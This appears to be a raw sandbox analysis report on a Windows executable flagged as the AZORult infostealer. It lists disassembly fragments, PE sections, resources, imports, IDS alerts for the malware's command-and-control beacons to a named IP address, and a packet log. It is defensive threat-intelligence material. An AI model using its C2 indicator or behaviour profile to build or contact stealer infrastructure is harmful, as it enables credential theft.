                                    and dword ptr [ecx+08h], 00000000h
                                    mov dword ptr [ecx+04h], 0049FDF8h
                                    mov dword ptr [ecx], 0049FDF0h
                                    ret
                                    push ebp
                                    mov ebp, esp
                                    push esi
                                    push dword ptr [ebp+08h]
                                    mov esi, ecx
                                    call 00007FC99CC05D4Ah
                                    mov dword ptr [esi], 0049FE0Ch
                                    mov eax, esi
                                    pop esi
                                    pop ebp
                                    retn 0004h
                                    and dword ptr [ecx+04h], 00000000h
                                    mov eax, ecx
                                    and dword ptr [ecx+08h], 00000000h
                                    mov dword ptr [ecx+04h], 0049FE14h
                                    mov dword ptr [ecx], 0049FE0Ch
                                    ret
                                    push ebp
                                    mov ebp, esp
                                    push esi
                                    mov esi, ecx
                                    lea eax, dword ptr [esi+04h]
                                    mov dword ptr [esi], 0049FDD0h
                                    and dword ptr [eax], 00000000h
                                    and dword ptr [eax+04h], 00000000h
                                    push eax
                                    mov eax, dword ptr [ebp+08h]
                                    add eax, 04h
                                    push eax
                                    call 00007FC99CC0893Dh
                                    pop ecx
                                    pop ecx
                                    mov eax, esi
                                    pop esi
                                    pop ebp
                                    retn 0004h
                                    lea eax, dword ptr [ecx+04h]
                                    mov dword ptr [ecx], 0049FDD0h
                                    push eax
                                    call 00007FC99CC08988h
                                    pop ecx
                                    ret
                                    push ebp
                                    mov ebp, esp
                                    push esi
                                    mov esi, ecx
                                    lea eax, dword ptr [esi+04h]
                                    mov dword ptr [esi], 0049FDD0h
                                    push eax
                                    call 00007FC99CC08971h
                                    test byte ptr [ebp+08h], 00000001h
                                    pop ecx
                                    Programming Language:
                                    • [ C ] VS2008 SP1 build 30729
                                    • [IMP] VS2008 SP1 build 30729
                                    Name | Virtual Address | Virtual Size | Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc8e64 | 0x17c | .rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0x65b68 | .rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x13a000 | 0x7594 | .reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb0ff0 | 0x1c | .rdata
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_TLS | 0xc3400 | 0x18 | .rdata
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb1010 | 0x40 | .rdata
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x9c000 | 0x894 | .rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                    .text | 0x1000 | 0x9ab1d | 0x9ac00 | 0a1473f3064dcbc32ef93c5c8a90f3a6 | False | 0.565500681542811 | data | 6.668273581389308 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata | 0x9c000 | 0x2fb82 | 0x2fc00 | c9cf2468b60bf4f80f136ed54b3989fb | False | 0.35289185209424084 | data | 5.691811547483722 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data | 0xcc000 | 0x706c | 0x4800 | 53b9025d545d65e23295e30afdbd16d9 | False | 0.04356553819444445 | DOS executable (block device driver @\273\) | 0.5846666986982398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc | 0xd4000 | 0x65b68 | 0x65c00 | 263c238dbd516afef7442c3765e4a28a | False | 0.6125014396498771 | data | 6.036926432496404 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc | 0x13a000 | 0x7594 | 0x7600 | c68ee8931a32d45eb82dc450ee40efc3 | False | 0.7628111758474576 | data | 6.7972128181359786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                    Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                    RT_ICON | 0xd4608 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
                                    RT_ICON | 0xd4730 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
                                    RT_ICON | 0xd4858 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
                                    RT_ICON | 0xd4980 | 0x2fcb | PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.9289742541888026
                                    RT_ICON | 0xd794c | 0x1530 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.971976401179941
                                    RT_ICON | 0xd8e7c | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | Great Britain | 0.04035549509050041
                                    RT_ICON | 0xe96a4 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | Great Britain | 0.05344755097750683
                                    RT_ICON | 0xf2b4c | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | Great Britain | 0.06903881700554529
                                    RT_ICON | 0xf7fd4 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | Great Britain | 0.06672177609825225
                                    RT_ICON | 0xfc1fc | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.09647302904564316
                                    RT_ICON | 0xfe7a4 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.11303939962476547
                                    RT_ICON | 0xff84c | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | Great Britain | 0.16024590163934427
                                    RT_ICON | 0x1001d4 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.18882978723404256
                                    RT_MENU | 0x10063c | 0x50 | data | English | Great Britain | 0.9
                                    RT_STRING | 0x10068c | 0x594 | data | English | Great Britain | 0.3333333333333333
                                    RT_STRING | 0x100c20 | 0x68a | data | English | Great Britain | 0.2735961768219833
                                    RT_STRING | 0x1012ac | 0x490 | data | English | Great Britain | 0.3715753424657534
                                    RT_STRING | 0x10173c | 0x5fc | data | English | Great Britain | 0.3087467362924282
                                    RT_STRING | 0x101d38 | 0x65c | data | English | Great Britain | 0.34336609336609336
                                    RT_STRING | 0x102394 | 0x466 | data | English | Great Britain | 0.3605683836589698
                                    RT_STRING | 0x1027fc | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
                                    RT_RCDATA | 0x102954 | 0x36c76 | data | | | 1.000338720172569
                                    RT_GROUP_ICON | 0x1395cc | 0x92 | data | English | Great Britain | 0.7054794520547946
                                    RT_GROUP_ICON | 0x139660 | 0x14 | data | English | Great Britain | 1.25
                                    RT_GROUP_ICON | 0x139674 | 0x14 | data | English | Great Britain | 1.15
                                    RT_GROUP_ICON | 0x139688 | 0x14 | data | English | Great Britain | 1.25
                                    RT_VERSION | 0x13969c | 0xdc | data | English | Great Britain | 0.6181818181818182
                                    RT_MANIFEST | 0x139778 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
                                    DLLImport
                                    WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                    VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                    COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                    MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                    WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                    PSAPI.DLLGetProcessMemoryInfo
                                    IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                    USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                    UxTheme.dllIsThemeActive
                                    KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, 
GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll: GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll: EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll: GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll: GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll: DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll: CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll: CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP
2024-08-29T12:02:33.732607+0200 | TCP | 2029136 | ET MALWARE AZORult v3.3 Server Response M1 | 1 | 80 | 49717 | 172.67.128.117 | 192.168.2.6
2024-08-29T12:02:42.498882+0200 | TCP | 2029467 | ET MALWARE Win32/AZORult V3.3 Client Checkin M14 | 1 | 49718 | 80 | 192.168.2.6 | 172.67.128.117
2024-08-29T12:02:33.484339+0200 | TCP | 2029467 | ET MALWARE Win32/AZORult V3.3 Client Checkin M14 | 1 | 49717 | 80 | 192.168.2.6 | 172.67.128.117
2024-08-29T12:02:33.484339+0200 | TCP | 2810276 | ETPRO MALWARE AZORult CnC Beacon M1 | 1 | 49717 | 80 | 192.168.2.6 | 172.67.128.117
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    Aug 29, 2024 12:02:34.233733892 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.233747959 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.233763933 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.234019041 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.234030008 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.234064102 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.234215021 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.234256983 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.234440088 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.234462023 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.234474897 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.234483957 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.234487057 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.234498024 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.234509945 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.234510899 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.234522104 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.234540939 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.234560966 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.234579086 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.234620094 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.236809969 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.236823082 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.236835957 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.236872911 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.236888885 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.236917019 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.236927986 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.236938953 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.236949921 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.236954927 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.236968040 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.236988068 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.237018108 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.237149000 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237159967 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237170935 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237181902 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237195015 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237201929 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.237205029 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237216949 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237216949 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.237241983 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237243891 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.237252951 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237263918 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237271070 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.237276077 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237287998 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237289906 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.237306118 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237318039 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237324953 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.237329960 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237356901 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.237371922 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.237535954 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237580061 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.237598896 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237615108 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237627029 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237653017 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.237673998 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.237692118 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237704039 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237715006 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237723112 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.237731934 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237741947 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.237744093 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237755060 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.237760067 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.237776995 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.237807035 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.238087893 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.238099098 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.238130093 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.238147974 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.238154888 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.238158941 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.238169909 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.238192081 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.238220930 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.238293886 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.238306046 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.238317013 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.238327980 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.238341093 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.238342047 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.238352060 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.238364935 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.238385916 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.238420010 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.238454103 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.238466024 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.238476992 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.238490105 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.238502979 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.238507032 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.238516092 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.238543987 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.239731073 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.239787102 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.239885092 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.239932060 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.239934921 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.240003109 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.240032911 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.240050077 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.240081072 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.240102053 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.240267992 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.240312099 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.240350962 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.240361929 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.240390062 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.240408897 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:34.240493059 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.240504026 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.240515947 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.240526915 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:34.240539074 CEST4971780192.168.2.6172.67.128.117
